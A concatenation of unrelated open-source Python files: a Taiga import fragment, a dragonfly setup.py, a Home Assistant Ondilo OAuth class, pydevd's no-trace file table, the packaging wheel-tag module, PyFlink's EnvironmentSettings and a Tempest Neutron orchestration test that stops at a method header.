if not seq.exists(sequence_name):
seq.create(sequence_name)
seq.set_max(sequence_name, serialized.object.ref)
else:
serialized.object.ref, _ = refs.make_reference(serialized.object, project)
serialized.object.save()
for attachment in data.get("attachments", []):
store_attachment(project, serialized.object, attachment)
history_entries = data.get("history", [])
for history in history_entries:
store_history(project, serialized.object, history)
if not history_entries:
take_snapshot(serialized.object, user=serialized.object.owner)
custom_attributes_values = data.get("custom_attributes_values", None)
if custom_attributes_values:
custom_attributes = serialized.object.project.issuecustomattributes.all().values('id', 'name')
custom_attributes_values = _use_id_instead_name_as_key_in_custom_attributes_values(custom_attributes,
custom_attributes_values)
store_custom_attributes_values(serialized.object, custom_attributes_values,
"issue", serializers.IssueCustomAttributesValuesExportSerializer)
return serialized
add_errors("issues", serialized.errors)
return None
|
from ez_setup import use_setuptools
use_setuptools()
import os.path
import re
import sys
from setuptools import setup, find_packages
directory = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(directory, "version.txt")
version_string = open(path).readline()
match = re.match(r"\s*(?P<rel>(?P<ver>\d+\.\d+)(?:\.\S+)*)\s*", version_string)
version = match.group("ver")
release = match.group("rel")
def read(*names):
return open(os.path.join(os.path.dirname(__file__), *names)).read()
setup(
name = "dragonfly",
version = release,
description = "Speech recognition extension library",
author = "Christo Butcher",
author_email = "dist.dragonfly@twizzy.biz",
license = "LICENSE.txt",
url = "https://github.com/t4ngo/dragonfly",
zip_safe = False, # To unzip documentation files.
long_description = read("README.md"),
install_requires=[
"setuptools >= 0.6c7",
"pywin32",
],
classifiers=[
"Environment :: Win32 (MS Windows)",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: "
"GNU Library or Lesser General Public License (LGPL)",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python",
],
packages=find_packages(),
test_suite="dragonfly.test.suites.natlink_suite",
)
|
"""Local implementation of OAuth2 specific to Ondilo to hard code client id and secret and return a proper name."""
from homeassistant.core import HomeAssistant
from homeassistant.helpers.config_entry_oauth2_flow import LocalOAuth2Implementation
from .const import (
DOMAIN,
OAUTH2_AUTHORIZE,
OAUTH2_CLIENTID,
OAUTH2_CLIENTSECRET,
OAUTH2_TOKEN,
)
class OndiloOauth2Implementation(LocalOAuth2Implementation):
"""Local implementation of OAuth2 specific to Ondilo to hard code client id and secret and return a proper name."""
def __init__(self, hass: HomeAssistant):
"""Just init default class with default values."""
super().__init__(
hass,
DOMAIN,
OAUTH2_CLIENTID,
OAUTH2_CLIENTSECRET,
OAUTH2_AUTHORIZE,
OAUTH2_TOKEN,
)
@property
def name(self) -> str:
"""Name of the implementation."""
return "Ondilo"
|
from _pydevd_bundle.pydevd_constants import IS_PY3K
LIB_FILE = 1
PYDEV_FILE = 2
DONT_TRACE = {
# commonly used things from the stdlib that we don't want to trace
'Queue.py':LIB_FILE,
'queue.py':LIB_FILE,
'socket.py':LIB_FILE,
'weakref.py':LIB_FILE,
'_weakrefset.py':LIB_FILE,
'linecache.py':LIB_FILE,
'threading.py':LIB_FILE,
'dis.py':LIB_FILE,
#things from pydev that we don't want to trace
'_pydev_BaseHTTPServer.py': PYDEV_FILE,
'_pydev_SimpleXMLRPCServer.py': PYDEV_FILE,
'_pydev_SocketServer.py': PYDEV_FILE,
'_pydev_calltip_util.py': PYDEV_FILE,
'_pydev_completer.py': PYDEV_FILE,
'_pydev_execfile.py': PYDEV_FILE,
'_pydev_filesystem_encoding.py': PYDEV_FILE,
'_pydev_getopt.py': PYDEV_FILE,
'_pydev_imports_tipper.py': PYDEV_FILE,
'_pydev_inspect.py': PYDEV_FILE,
'_pydev_jy_imports_tipper.py': PYDEV_FILE,
'_pydev_log.py': PYDEV_FILE,
'_pydev_pkgutil_old.py': PYDEV_FILE,
'_pydev_saved_modules.py': PYDEV_FILE,
'_pydev_sys_patch.py': PYDEV_FILE,
'_pydev_tipper_common.py': PYDEV_FILE,
'_pydev_xmlrpclib.py': PYDEV_FILE,
'django_debug.py': PYDEV_FILE,
'fix_getpass.py': PYDEV_FILE,
'jinja2_debug.py': PYDEV_FILE,
'pycompletionserver.py': PYDEV_FILE,
'pydev_app_engine_debug_startup.py': PYDEV_FILE,
'pydev_code_executor.py': PYDEV_FILE,
'pydev_console_commands.py': PYDEV_FILE,
'pydev_console_types.py': PYDEV_FILE,
'pydev_console_utils.py': PYDEV_FILE,
'pydev_import_hook.py': PYDEV_FILE,
'pydev_imports.py': PYDEV_FILE,
'pydev_io.py': PYDEV_FILE,
'pydev_ipython_code_executor.py': PYDEV_FILE,
'pydev_ipython_completer.py': PYDEV_FILE,
'pydev_ipython_console.py': PYDEV_FILE,
'pydev_ipython_console_011.py': PYDEV_FILE,
'pydev_ipython_rich_output.py': PYDEV_FILE,
'pydev_is_thread_alive.py': PYDEV_FILE,
'pydev_localhost.py': PYDEV_FILE,
'pydev_log.py': PYDEV_FILE,
'pydev_monkey.py': PYDEV_FILE,
'pydev_monkey_qt.py': PYDEV_FILE,
'pydev_override.py': PYDEV_FILE,
'pydev_protocol.py': PYDEV_FILE,
'pydev_rpc.py': PYDEV_FILE,
'pydev_server.py': PYDEV_FILE,
'pydev_stdin.py': PYDEV_FILE,
'pydev_transport.py': PYDEV_FILE,
'pydev_umd.py': PYDEV_FILE,
'pydev_versioncheck.py': PYDEV_FILE,
'pydevconsole.py': PYDEV_FILE,
'pydevconsole_code_for_ironpython.py': PYDEV_FILE,
'pydevd.py': PYDEV_FILE,
'pydevd_additional_thread_info.py': PYDEV_FILE,
'pydevd_additional_thread_info_regular.py': PYDEV_FILE,
'pydevd_breakpointhook.py': PYDEV_FILE,
'pydevd_breakpoints.py': PYDEV_FILE,
'pydevd_bytecode_utils.py': PYDEV_FILE,
'pydevd_collect_try_except_info.py': PYDEV_FILE,
'pydevd_comm.py': PYDEV_FILE,
'pydevd_comm_constants.py': PYDEV_FILE,
'pydevd_command_line_handling.py': PYDEV_FILE,
'pydevd_concurrency_logger.py': PYDEV_FILE,
'pydevd_console.py': PYDEV_FILE,
'pydevd_console_integration.py': PYDEV_FILE,
'pydevd_console_pytest.py': PYDEV_FILE,
'pydevd_constants.py': PYDEV_FILE,
'pydevd_custom_frames.py': PYDEV_FILE,
'pydevd_cython_wrapper.py': PYDEV_FILE,
'pydevd_dont_trace.py': PYDEV_FILE,
'pydevd_dont_trace_files.py': PYDEV_FILE,
'pydevd_exec.py': PYDEV_FILE,
'pydevd_exec2.py': PYDEV_FILE,
'pydevd_extension_api.py': PYDEV_FILE,
'pydevd_extension_utils.py': PYDEV_FILE,
'pydevd_file_utils.py': PYDEV_FILE,
'pydevd_frame.py': PYDEV_FILE,
'pydevd_frame_eval_cython_wrapper.py': PYDEV_FILE,
'pydevd_frame_eval_main.py': PYDEV_FILE,
'pydevd_frame_tracing.py': PYDEV_FILE,
'pydevd_frame_utils.py': PYDEV_FILE,
'pydevd_helpers.py': PYDEV_FILE,
'pydevd_import_class.py': PYDEV_FILE,
'pydevd_io.py': PYDEV_FILE,
'pydevd_kill_all_pydevd_threads.py': PYDEV_FILE,
'pydevd_modify_bytecode.py': PYDEV_FILE,
'pydevd_plugin_numpy_types.py': PYDEV_FILE,
'pydevd_plugin_utils.py': PYDEV_FILE,
'pydevd_plugins_django_form_str.py': PYDEV_FILE,
'pydevd_process_net_command.py': PYDEV_FILE,
'pydevd_pycharm.py': PYDEV_FILE,
'pydevd_referrers.py': PYDEV_FILE,
'pydevd_reload.py': PYDEV_FILE,
'pydevd_resolver.py': PYDEV_FILE,
'pydevd_save_locals.py': PYDEV_FILE,
'pydevd_signature.py': PYDEV_FILE,
'pydevd_stackless.py': PYDEV_FILE,
'pydevd_tables.py': PYDEV_FILE,
'pydevd_thread_wrappers.py': PYDEV_FILE,
'pydevd_thrift.py': PYDEV_FILE,
'pydevd_trace_api.py': PYDEV_FILE,
'pydevd_trace_dispatch.py': PYDEV_FILE,
'pydevd_trace_dispatch_regular.py': PYDEV_FILE,
'pydevd_traceproperty.py': PYDEV_FILE,
'pydevd_tracing.py': PYDEV_FILE,
'pydevd_utils.py': PYDEV_FILE,
'pydevd_vars.py': PYDEV_FILE,
'pydevd_vm_type.py': PYDEV_FILE,
'pydevd_xml.py': PYDEV_FILE,
'pydevd_console_output.py': PYDEV_FILE,
}
DONT_TRACE['pydev_jupyter_plugin.py'] = PYDEV_FILE
DONT_TRACE['pydev_jupyter_utils.py'] = PYDEV_FILE
if IS_PY3K:
# if we try to trace io.py it seems it can get halted (see http://bugs.python.org/issue4716)
DONT_TRACE['io.py'] = LIB_FILE
# Don't trace common encodings too
DONT_TRACE['cp1252.py'] = LIB_FILE
DONT_TRACE['utf_8.py'] = LIB_FILE
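# Illustrative sketch (not part of the original module): a tracer would
# typically consult this table by base name to classify a frame's file.
# The helper below is hypothetical.
def _classify_file(filename):
    import os.path
    # Returns LIB_FILE, PYDEV_FILE, or None (meaning: do trace it).
    return DONT_TRACE.get(os.path.basename(filename))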
|
import logging
import platform
import sys
import sysconfig
from importlib.machinery import EXTENSION_SUFFIXES
from typing import (
Dict,
FrozenSet,
Iterable,
Iterator,
List,
Optional,
Sequence,
Tuple,
Union,
cast,
)
from . import _manylinux, _musllinux
logger = logging.getLogger(__name__)
PythonVersion = Sequence[int]
MacVersion = Tuple[int, int]
INTERPRETER_SHORT_NAMES: Dict[str, str] = {
"python": "py", # Generic.
"cpython": "cp",
"pypy": "pp",
"ironpython": "ip",
"jython": "jy",
}
_32_BIT_INTERPRETER = sys.maxsize <= 2 ** 32
class Tag:
"""
A representation of the tag triple for a wheel.
Instances are considered immutable and thus are hashable. Equality checking
is also supported.
"""
__slots__ = ["_interpreter", "_abi", "_platform", "_hash"]
def __init__(self, interpreter: str, abi: str, platform: str) -> None:
self._interpreter = interpreter.lower()
self._abi = abi.lower()
self._platform = platform.lower()
# The __hash__ of every single element in a Set[Tag] will be evaluated each time
        # that a set calls its `.isdisjoint()` method, which may be called hundreds of
# times when scanning a page of links for packages with tags matching that
# Set[Tag]. Pre-computing the value here produces significant speedups for
# downstream consumers.
self._hash = hash((self._interpreter, self._abi, self._platform))
@property
def interpreter(self) -> str:
return self._interpreter
@property
def abi(self) -> str:
return self._abi
@property
def platform(self) -> str:
return self._platform
def __eq__(self, other: object) -> bool:
if not isinstance(other, Tag):
return NotImplemented
return (
(self._hash == other._hash) # Short-circuit ASAP for perf reasons.
and (self._platform == other._platform)
and (self._abi == other._abi)
and (self._interpreter == other._interpreter)
)
def __hash__(self) -> int:
return self._hash
def __str__(self) -> str:
return f"{self._interpreter}-{self._abi}-{self._platform}"
def __repr__(self) -> str:
return "<{self} @ {self_id}>".format(self=self, self_id=id(self))
def parse_tag(tag: str) -> FrozenSet[Tag]:
"""
Parses the provided tag (e.g. `py3-none-any`) into a frozenset of Tag instances.
Returning a set is required due to the possibility that the tag is a
compressed tag set.
"""
tags = set()
interpreters, abis, platforms = tag.split("-")
for interpreter in interpreters.split("."):
for abi in abis.split("."):
for platform_ in platforms.split("."):
tags.add(Tag(interpreter, abi, platform_))
return frozenset(tags)
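# Illustrative sketch (not part of the original module): a compressed tag
# set expands into the cross product of its dot-separated components.
def _demo_parse_tag() -> None:
    expanded = parse_tag("cp38.cp39-abi3-manylinux1_x86_64")
    assert Tag("cp38", "abi3", "manylinux1_x86_64") in expanded
    assert Tag("cp39", "abi3", "manylinux1_x86_64") in expanded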
def _get_config_var(name: str, warn: bool = False) -> Union[int, str, None]:
value = sysconfig.get_config_var(name)
if value is None and warn:
logger.debug(
"Config variable '%s' is unset, Python ABI tag may be incorrect", name
)
return value
def _normalize_string(string: str) -> str:
return string.replace(".", "_").replace("-", "_")
def _abi3_applies(python_version: PythonVersion) -> bool:
"""
Determine if the Python version supports abi3.
PEP 384 was first implemented in Python 3.2.
"""
return len(python_version) > 1 and tuple(python_version) >= (3, 2)
def _cpython_abis(py_version: PythonVersion, warn: bool = False) -> List[str]:
py_version = tuple(py_version) # To allow for version comparison.
abis = []
version = _version_nodot(py_version[:2])
debug = pymalloc = ucs4 = ""
with_debug = _get_config_var("Py_DEBUG", warn)
has_refcount = hasattr(sys, "gettotalrefcount")
# Windows doesn't set Py_DEBUG, so checking for support of debug-compiled
# extension modules is the best option.
# https://github.com/pypa/pip/issues/3383#issuecomment-173267692
has_ext = "_d.pyd" in EXTENSION_SUFFIXES
if with_debug or (with_debug is None and (has_refcount or has_ext)):
debug = "d"
if py_version < (3, 8):
with_pymalloc = _get_config_var("WITH_PYMALLOC", warn)
if with_pymalloc or with_pymalloc is None:
pymalloc = "m"
if py_version < (3, 3):
unicode_size = _get_config_var("Py_UNICODE_SIZE", warn)
if unicode_size == 4 or (
unicode_size is None and sys.maxunicode == 0x10FFFF
):
ucs4 = "u"
elif debug:
# Debug builds can also load "normal" extension modules.
# We can also assume no UCS-4 or pymalloc requirement.
abis.append(f"cp{version}")
abis.insert(
0,
"cp{version}{debug}{pymalloc}{ucs4}".format(
version=version, debug=debug, pymalloc=pymalloc, ucs4=ucs4
),
)
return abis
def cpython_tags(
python_version: Optional[PythonVersion] = None,
abis: Optional[Iterable[str]] = None,
platforms: Optional[Iterable[str]] = None,
*,
warn: bool = False,
) -> Iterator[Tag]:
"""
Yields the tags for a CPython interpreter.
The tags consist of:
- cp<python_version>-<abi>-<platform>
- cp<python_version>-abi3-<platform>
- cp<python_version>-none-<platform>
- cp<less than python_version>-abi3-<platform> # Older Python versions down to 3.2.
If python_version only specifies a major version then user-provided ABIs and
    the 'none' ABI tag will be used.
If 'abi3' or 'none' are specified in 'abis' then they will be yielded at
their normal position and not at the beginning.
"""
if not python_version:
python_version = sys.version_info[:2]
interpreter = "cp{}".format(_version_nodot(python_version[:2]))
if abis is None:
if len(python_version) > 1:
abis = _cpython_abis(python_version, warn)
else:
abis = []
abis = list(abis)
# 'abi3' and 'none' are explicitly handled later.
for explicit_abi in ("abi3", "none"):
try:
abis.remove(explicit_abi)
except ValueError:
pass
platforms = list(platforms or platform_tags())
for abi in abis:
for platform_ in platforms:
yield Tag(interpreter, abi, platform_)
if _abi3_applies(python_version):
yield from (Tag(interpreter, "abi3", platform_) for platform_ in platforms)
yield from (Tag(interpreter, "none", platform_) for platform_ in platforms)
if _abi3_applies(python_version):
for minor_version in range(python_version[1] - 1, 1, -1):
for platform_ in platforms:
interpreter = "cp{version}".format(
version=_version_nodot((python_version[0], minor_version))
)
yield Tag(interpreter, "abi3", platform_)
def _generic_abi() -> Iterator[str]:
abi = sysconfig.get_config_var("SOABI")
if abi:
yield _normalize_string(abi)
def generic_tags(
interpreter: Optional[str] = None,
abis: Optional[Iterable[str]] = None,
platforms: Optional[Iterable[str]] = None,
*,
warn: bool = False,
) -> Iterator[Tag]:
"""
Yields the tags for a generic interpreter.
The tags consist of:
- <interpreter>-<abi>-<platform>
The "none" ABI will be added if it was not explicitly provided.
"""
if not interpreter:
interp_name = interpreter_name()
interp_version = interpreter_version(warn=warn)
interpreter = "".join([interp_name, interp_version])
if abis is None:
abis = _generic_abi()
platforms = list(platforms or platform_tags())
abis = list(abis)
if "none" not in abis:
abis.append("none")
for abi in abis:
for platform_ in platforms:
yield Tag(interpreter, abi, platform_)
def _py_interpreter_range(py_version: PythonVersion) -> Iterator[str]:
"""
Yields Python versions in descending order.
After the latest version, the major-only version will be yielded, and then
all previous versions of that major version.
"""
if len(py_version) > 1:
yield "py{version}".format(version=_version_nodot(py_version[:2]))
yield "py{major}".format(major=py_version[0])
if len(py_version) > 1:
for minor in range(py_version[1] - 1, -1, -1):
yield "py{version}".format(version=_version_nodot((py_version[0], minor)))
def compatible_tags(
python_version: Optional[PythonVersion] = None,
interpreter: Optional[str] = None,
platforms: Optional[Iterable[str]] = None,
) -> Iterator[Tag]:
"""
Yields the sequence of tags that are compatible with a specific version of Python.
The tags consist of:
- py*-none-<platform>
- <interpreter>-none-any # ... if `interpreter` is provided.
- py*-none-any
"""
if not python_version:
python_version = sys.version_info[:2]
platforms = list(platforms or platform_tags())
for version in _py_interpreter_range(python_version):
for platform_ in platforms:
yield Tag(version, "none", platform_)
if interpreter:
yield Tag(interpreter, "none", "any")
for version in _py_interpreter_range(python_version):
yield Tag(version, "none", "any")
def _mac_arch(arch: str, is_32bit: bool = _32_BIT_INTERPRETER) -> str:
if not is_32bit:
return arch
if arch.startswith("ppc"):
return "ppc"
return "i386"
def _mac_binary_formats(version: MacVersion, cpu_arch: str) -> List[str]:
formats = [cpu_arch]
if cpu_arch == "x86_64":
if version < (10, 4):
return []
formats.extend(["intel", "fat64", "fat32"])
elif cpu_arch == "i386":
if version < (10, 4):
return []
formats.extend(["intel", "fat32", "fat"])
elif cpu_arch == "ppc64":
# TODO: Need to care about 32-bit PPC for ppc64 through 10.2?
if version > (10, 5) or version < (10, 4):
return []
formats.append("fat64")
elif cpu_arch == "ppc":
if version > (10, 6):
return []
formats.extend(["fat32", "fat"])
if cpu_arch in {"arm64", "x86_64"}:
formats.append("universal2")
if cpu_arch in {"x86_64", "i386", "ppc64", "ppc", "intel"}:
formats.append("universal")
return formats
def mac_platforms(
version: Optional[MacVersion] = None, arch: Optional[str] = None
) -> Iterator[str]:
"""
Yields the platform tags for a macOS system.
The `version` parameter is a two-item tuple specifying the macOS version to
generate platform tags for. The `arch` parameter is the CPU architecture to
generate platform tags for. Both parameters default to the appropriate value
for the current system.
"""
version_str, _, cpu_arch = platform.mac_ver()
    if version is None:
        version = cast("MacVersion", tuple(map(int, version_str.split(".")[:2])))
    if arch is None:
        arch = _mac_arch(cpu_arch)
    if (10, 0) <= version < (11, 0):
# Prior to Mac OS 11, each yearly release of Mac OS bumped the
# "minor" version number. The major version was always 10.
for minor_version in range(version[1], -1, -1):
compat_version = 10, minor_version
binary_formats = _mac_binary_formats(compat_version, arch)
for binary_format in binary_formats:
yield "macosx_{major}_{minor}_{binary_format}".format(
major=10, minor=minor_version, binary_format=binary_format
)
if version >= (11, 0):
# Starting with Mac OS 11, each yearly release bumps the major version
# number. The minor versions are now the midyear updates.
for major_version in range(version[0], 10, -1):
compat_version = major_version, 0
binary_formats = _mac_binary_formats(compat_version, arch)
for binary_format in binary_formats:
yield "macosx_{major}_{minor}_{binary_format}".format(
major=major_version, minor=0, binary_format=binary_format
)
if version >= (11, 0):
# Mac OS 11 on x86_64 is compatible with binaries from previous releases.
# Arm64 support was introduced in 11.0, so no Arm binaries from previous
# releases exist.
#
# However, the "universal2" binary format can have a
# macOS version earlier than 11.0 when the x86_64 part of the binary supports
# that version of macOS.
if arch == "x86_64":
for minor_version in range(16, 3, -1):
compat_version = 10, minor_version
binary_formats = _mac_binary_formats(compat_version, arch)
for binary_format in binary_formats:
yield "macosx_{major}_{minor}_{binary_format}".format(
major=compat_version[0],
minor=compat_version[1],
binary_format=binary_format,
)
else:
for minor_version in range(16, 3, -1):
compat_version = 10, minor_version
binary_format = "universal2"
yield "macosx_{major}_{minor}_{binary_format}".format(
major=compat_version[0],
minor=compat_version[1],
binary_format=binary_format,
)
def _linux_platforms(is_32bit: bool = _32_BIT_INTERPRETER) -> Iterator[str]:
linux = _normalize_string(sysconfig.get_platform())
if is_32bit:
if linux == "linux_x86_64":
linux = "linux_i686"
elif linux == "linux_aarch64":
linux = "linux_armv7l"
_, arch = linux.split("_", 1)
yield from _manylinux.platform_tags(linux, arch)
yield from _musllinux.platform_tags(arch)
yield linux
def _generic_platforms() -> Iterator[str]:
yield _normalize_string(sysconfig.get_platform())
def platform_tags() -> Iterator[str]:
"""
Provides the platform tags for this installation.
"""
if platform.system() == "Darwin":
return mac_platforms()
elif platform.system() == "Linux":
return _linux_platforms()
else:
return _generic_platforms()
def interpreter_name() -> str:
"""
Returns the name of the running interpreter.
"""
name = sys.implementation.name
return INTERPRETER_SHORT_NAMES.get(name) or name
def interpreter_version(*, warn: bool = False) -> str:
"""
Returns the version of the running interpreter.
"""
version = _get_config_var("py_version_nodot", warn=warn)
if version:
version = str(version)
else:
version = _version_nodot(sys.version_info[:2])
return version
def _version_nodot(version: PythonVersion) -> str:
return "".join(map(str, version))
def sys_tags(*, warn: bool = False) -> Iterator[Tag]:
"""
Returns the sequence of tag triples for the running interpreter.
The order of the sequence corresponds to priority order for the
interpreter, from most to least important.
"""
interp_name = interpreter_name()
if interp_name == "cp":
yield from cpython_tags(warn=warn)
else:
yield from generic_tags()
yield from compatible_tags()
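if __name__ == "__main__":
    # Illustrative (not part of the original module): print the tag triples
    # supported by the running interpreter, most preferred first.
    for tag in sys_tags():
        print(tag)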
|
from pyflink.java_gateway import get_gateway
from pyflink.common import Configuration
__all__ = ['EnvironmentSettings']
class EnvironmentSettings(object):
"""
Defines all parameters that initialize a table environment. Those parameters are used only
during instantiation of a :class:`~pyflink.table.TableEnvironment` and cannot be changed
afterwards.
Example:
::
>>> EnvironmentSettings.new_instance() \\
... .in_streaming_mode() \\
... .with_built_in_catalog_name("my_catalog") \\
... .with_built_in_database_name("my_database") \\
... .build()
:func:`EnvironmentSettings.in_streaming_mode` or :func:`EnvironmentSettings.in_batch_mode`
might be convenient as shortcuts.
"""
class Builder(object):
"""
A builder for :class:`EnvironmentSettings`.
"""
def __init__(self):
gateway = get_gateway()
self._j_builder = gateway.jvm.EnvironmentSettings.Builder()
def in_batch_mode(self) -> 'EnvironmentSettings.Builder':
"""
Sets that the components should work in a batch mode. Streaming mode by default.
:return: This object.
"""
self._j_builder = self._j_builder.inBatchMode()
return self
def in_streaming_mode(self) -> 'EnvironmentSettings.Builder':
"""
Sets that the components should work in a streaming mode. Enabled by default.
:return: This object.
"""
self._j_builder = self._j_builder.inStreamingMode()
return self
def with_built_in_catalog_name(self, built_in_catalog_name: str) \
-> 'EnvironmentSettings.Builder':
"""
Specifies the name of the initial catalog to be created when instantiating
a :class:`~pyflink.table.TableEnvironment`.
This catalog is an in-memory catalog that will be used to store all temporary objects
(e.g. from :func:`~pyflink.table.TableEnvironment.create_temporary_view` or
:func:`~pyflink.table.TableEnvironment.create_temporary_system_function`) that cannot
be persisted because they have no serializable representation.
It will also be the initial value for the current catalog which can be altered via
:func:`~pyflink.table.TableEnvironment.use_catalog`.
Default: "default_catalog".
:param built_in_catalog_name: The specified built-in catalog name.
:return: This object.
"""
self._j_builder = self._j_builder.withBuiltInCatalogName(built_in_catalog_name)
return self
def with_built_in_database_name(self, built_in_database_name: str) \
-> 'EnvironmentSettings.Builder':
"""
Specifies the name of the default database in the initial catalog to be
created when instantiating a :class:`~pyflink.table.TableEnvironment`.
This database is an in-memory database that will be used to store all temporary
objects (e.g. from :func:`~pyflink.table.TableEnvironment.create_temporary_view` or
:func:`~pyflink.table.TableEnvironment.create_temporary_system_function`) that cannot
be persisted because they have no serializable representation.
            It will also be the initial value for the current database which can be altered via
            :func:`~pyflink.table.TableEnvironment.use_database`.
Default: "default_database".
:param built_in_database_name: The specified built-in database name.
:return: This object.
"""
self._j_builder = self._j_builder.withBuiltInDatabaseName(built_in_database_name)
return self
def build(self) -> 'EnvironmentSettings':
"""
Returns an immutable instance of EnvironmentSettings.
:return: an immutable instance of EnvironmentSettings.
"""
return EnvironmentSettings(self._j_builder.build())
def __init__(self, j_environment_settings):
self._j_environment_settings = j_environment_settings
def get_built_in_catalog_name(self) -> str:
"""
Gets the specified name of the initial catalog to be created when instantiating a
:class:`~pyflink.table.TableEnvironment`.
:return: The specified name of the initial catalog to be created.
"""
return self._j_environment_settings.getBuiltInCatalogName()
def get_built_in_database_name(self) -> str:
"""
Gets the specified name of the default database in the initial catalog to be created when
instantiating a :class:`~pyflink.table.TableEnvironment`.
:return: The specified name of the default database in the initial catalog to be created.
"""
return self._j_environment_settings.getBuiltInDatabaseName()
def is_streaming_mode(self) -> bool:
"""
Tells if the :class:`~pyflink.table.TableEnvironment` should work in a batch or streaming
mode.
:return: True if the TableEnvironment should work in a streaming mode, false otherwise.
"""
return self._j_environment_settings.isStreamingMode()
def to_configuration(self) -> Configuration:
"""
Convert to `pyflink.common.Configuration`.
:return: Configuration with specified value.
"""
return Configuration(j_configuration=self._j_environment_settings.toConfiguration())
@staticmethod
def new_instance() -> 'EnvironmentSettings.Builder':
"""
Creates a builder for creating an instance of EnvironmentSettings.
:return: A builder of EnvironmentSettings.
"""
return EnvironmentSettings.Builder()
@staticmethod
def from_configuration(config: Configuration) -> 'EnvironmentSettings':
"""
        Creates an EnvironmentSettings instance from the specified Configuration.
:return: EnvironmentSettings.
"""
return EnvironmentSettings(
get_gateway().jvm.EnvironmentSettings.fromConfiguration(config._j_configuration))
@staticmethod
def in_streaming_mode() -> 'EnvironmentSettings':
"""
Creates a default instance of EnvironmentSettings in streaming execution mode.
In this mode, both bounded and unbounded data streams can be processed.
This method is a shortcut for creating a :class:`~pyflink.table.TableEnvironment` with
little code. Use the builder provided in :func:`EnvironmentSettings.new_instance` for
advanced settings.
:return: EnvironmentSettings.
"""
return EnvironmentSettings(
get_gateway().jvm.EnvironmentSettings.inStreamingMode())
@staticmethod
def in_batch_mode() -> 'EnvironmentSettings':
"""
Creates a default instance of EnvironmentSettings in batch execution mode.
This mode is highly optimized for batch scenarios. Only bounded data streams can be
processed in this mode.
This method is a shortcut for creating a :class:`~pyflink.table.TableEnvironment` with
little code. Use the builder provided in :func:`EnvironmentSettings.new_instance` for
advanced settings.
:return: EnvironmentSettings.
"""
return EnvironmentSettings(
get_gateway().jvm.EnvironmentSettings.inBatchMode())
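if __name__ == "__main__":
    # Illustrative sketch (not part of the original module; requires a
    # running JVM gateway): build settings and inspect the defaults.
    settings = EnvironmentSettings.new_instance() \
        .in_streaming_mode() \
        .with_built_in_catalog_name("my_catalog") \
        .build()
    print(settings.is_streaming_mode())          # True
    print(settings.get_built_in_catalog_name())  # my_catalog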
|
import logging
import netaddr
from tempest_lib.common.utils import data_utils
from tempest.api.orchestration import base
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class NeutronResourcesTestJSON(base.BaseOrchestrationTest):
@classmethod
def skip_checks(cls):
super(NeutronResourcesTestJSON, cls).skip_checks()
if not CONF.service_available.neutron:
raise cls.skipException("Neutron support is required")
@classmethod
def setup_credentials(cls):
super(NeutronResourcesTestJSON, cls).setup_credentials()
cls.os = clients.Manager()
@classmethod
def setup_clients(cls):
super(NeutronResourcesTestJSON, cls).setup_clients()
cls.network_client = cls.os.network_client
@classmethod
def resource_setup(cls):
super(NeutronResourcesTestJSON, cls).resource_setup()
cls.neutron_basic_template = cls.load_template('neutron_basic')
cls.stack_name = data_utils.rand_name('heat')
template = cls.read_template('neutron_basic')
cls.keypair_name = (CONF.orchestration.keypair_name or
cls._create_keypair()['name'])
cls.external_network_id = CONF.network.public_network_id
tenant_cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
cls.subnet_cidr = tenant_cidr.subnet(mask_bits).next()
# create the stack
cls.stack_identifier = cls.create_stack(
cls.stack_name,
template,
parameters={
'KeyName': cls.keypair_name,
'InstanceType': CONF.orchestration.instance_type,
'ImageId': CONF.compute.image_ref,
'ExternalNetworkId': cls.external_network_id,
'timeout': CONF.orchestration.build_timeout,
'DNSServers': CONF.network.dns_servers,
'SubNetCidr': str(cls.subnet_cidr)
})
cls.stack_id = cls.stack_identifier.split('/')[1]
try:
cls.client.wait_for_stack_status(cls.stack_id, 'CREATE_COMPLETE')
resources = cls.client.list_resources(cls.stack_identifier)
except exceptions.TimeoutException as e:
if CONF.compute_feature_enabled.console_output:
# attempt to log the server console to help with debugging
# the cause of the server not signalling the waitcondition
# to heat.
body = cls.client.show_resource(cls.stack_identifier,
'Server')
server_id = body['physical_resource_id']
LOG.debug('Console output for %s', server_id)
output = cls.servers_client.get_console_output(
server_id, None).data
LOG.debug(output)
raise e
cls.test_resources = {}
for resource in resources:
cls.test_resources[resource['logical_resource_id']] = resource
@test.idempotent_id('f9e2664c-bc44-4eef-98b6-495e4f9d74b3')
def test_created_resources(self):
"""Verifies created neutron resources."""
resources = [('Network', self.neutron_basic_template['resources'][
'Network']['type']),
('Subnet', self.neutron_basic_template['resources'][
'Subnet']['type']),
('RouterInterface', self.neutron_basic_template[
'resources']['RouterInterface']['type']),
('Server', self.neutron_basic_template['resources'][
'Server']['type'])]
for resource_name, resource_type in resources:
resource = self.test_resources.get(resource_name, None)
self.assertIsInstance(resource, dict)
self.assertEqual(resource_name, resource['logical_resource_id'])
self.assertEqual(resource_type, resource['resource_type'])
self.assertEqual('CREATE_COMPLETE', resource['resource_status'])
@test.idempotent_id('c572b915-edb1-4e90-b196-c7199a6848c0')
@test.services('network')
def test_created_network(self):
"""Verifies created network."""
network_id = self.test_resources.get('Network')['physical_resource_id']
body = self.network_client.show_network(network_id)
network = body['network']
self.assertIsInstance(network, dict)
self.assertEqual(network_id, network['id'])
self.assertEqual(self.neutron_basic_template['resources'][
'Network']['properties']['name'], network['name'])
@test.idempotent_id('e8f84b96-f9d7-4684-ad5f-340203e9f2c2')
@test.services('network')
def test_created_subnet(self):
"""Verifies created subnet."""
subnet_id = self.test_resources.get('Subnet')['physical_resource_id']
body = self.network_client.show_subnet(subnet_id)
subnet = body['subnet']
network_id = self.test_resources.get('Network')['physical_resource_id']
self.assertEqual(subnet_id, subnet['id'])
self.assertEqual(network_id, subnet['network_id'])
self.assertEqual(self.neutron_basic_template['resources'][
'Subnet']['properties']['name'], subnet['name'])
self.assertEqual(sorted(CONF.network.dns_servers),
sorted(subnet['dns_nameservers']))
self.assertEqual(self.neutron_basic_template['resources'][
'Subnet']['properties']['ip_version'], subnet['ip_version'])
self.assertEqual(str(self.subnet_cidr), subnet['cidr'])
@test.idempotent_id('96af4c7f-5069-44bc-bdcf-c0390f8a67d1')
@test.services('network')
def test_created_router(self):
"""Verifies created router."""
